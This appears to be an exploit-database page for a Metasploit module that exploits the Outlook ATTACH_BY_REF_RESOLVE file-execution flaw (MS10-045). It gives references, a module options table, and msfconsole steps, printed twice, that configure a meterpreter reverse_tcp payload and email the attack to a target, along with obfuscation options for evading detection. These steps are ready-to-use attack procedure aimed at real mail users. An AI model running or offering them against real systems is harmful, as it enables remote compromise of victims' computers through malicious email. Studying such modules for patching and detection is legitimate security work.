Outlook ATTACH_BY_REF_RESOLVE File Execution
It has been discovered that certain e-mail message cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also file stored remotely for example on a file share. Exploitation is limited by the fact that its is not possible for attackers to supply command line options.
Exploit Rank
- Excellent
Exploit Authors
- Yorick Koster < yorick [at] akitasecurity.nl >
Vulnerability References
- MSB-MS10-045
- CVE-2010-0266
- OSVDB-66296
- BID-41446
- http://www.akitasecurity.nl/advisory.php?id=AK20091001
Exploit Targets
- 0 - Automatic (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/email/ms07_017_ani_loadimage_chunksize
- exploit/windows/email/ms10_045_outlook_ref_only
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/email/ms10_045_outlook_ref_resolve
msf exploit(ms10_045_outlook_ref_resolve) > show payloads
msf exploit(ms10_045_outlook_ref_resolve) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_045_outlook_ref_resolve) > set LHOST [MY IP ADDRESS]
msf exploit(ms10_045_outlook_ref_resolve) > set MAILTO [STRING]
msf exploit(ms10_045_outlook_ref_resolve) > set RHOST [TARGET IP]
msf exploit(ms10_045_outlook_ref_resolve) > set SUBJECT [STRING]
msf exploit(ms10_045_outlook_ref_resolve) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/email/ms10_045_outlook_ref_resolve
msf exploit(ms10_045_outlook_ref_resolve) > show payloads
msf exploit(ms10_045_outlook_ref_resolve) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_045_outlook_ref_resolve) > set LHOST [MY IP ADDRESS]
msf exploit(ms10_045_outlook_ref_resolve) > set MAILTO [STRING]
msf exploit(ms10_045_outlook_ref_resolve) > set RHOST [TARGET IP]
msf exploit(ms10_045_outlook_ref_resolve) > set SUBJECT [STRING]
msf exploit(ms10_045_outlook_ref_resolve) > exploit
Exploit Module Options
| EXTENSION | The extension used in the fake file name (default: jpg) |
| MAILFROM | The FROM address of the e-mail (default: random@example.com) |
| MAILTO | The TO address of the email |
| MESSAGECLASS | Message Class value (default: IPM.Document.txtfile) |
| PASSWORD | SMTP Password for sending email |
| RHOST | The SMTP server to send through |
| RPORT | The SMTP server port (e.g. 25, 465, 587, 2525) (default: 25) |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The daemon port to listen on (do not change) (default: 80) |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SUBJECT | Subject line of the email |
| UNCHOST | The host portion of the UNC path to provide to clients (ex: 1.2.3.4). |
| URIPATH | The URI to use (do not change). (default: /) |
| USERNAME | SMTP Username for sending email |
| VERBOSE | Display verbose information (default: true) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| ListenerComm | The specific communication channel to use for this service |
| Proxies | Use a proxy chain |
| WORKSPACE | Specify the workspace for this module |
| HTML::base64 | Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::junk_headers | Enable insertion of random junk HTTP headers |
| HTTP::server_name | Configures the Server header of all outgoing replies |
| TCP::max_send_size | Maxiumum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |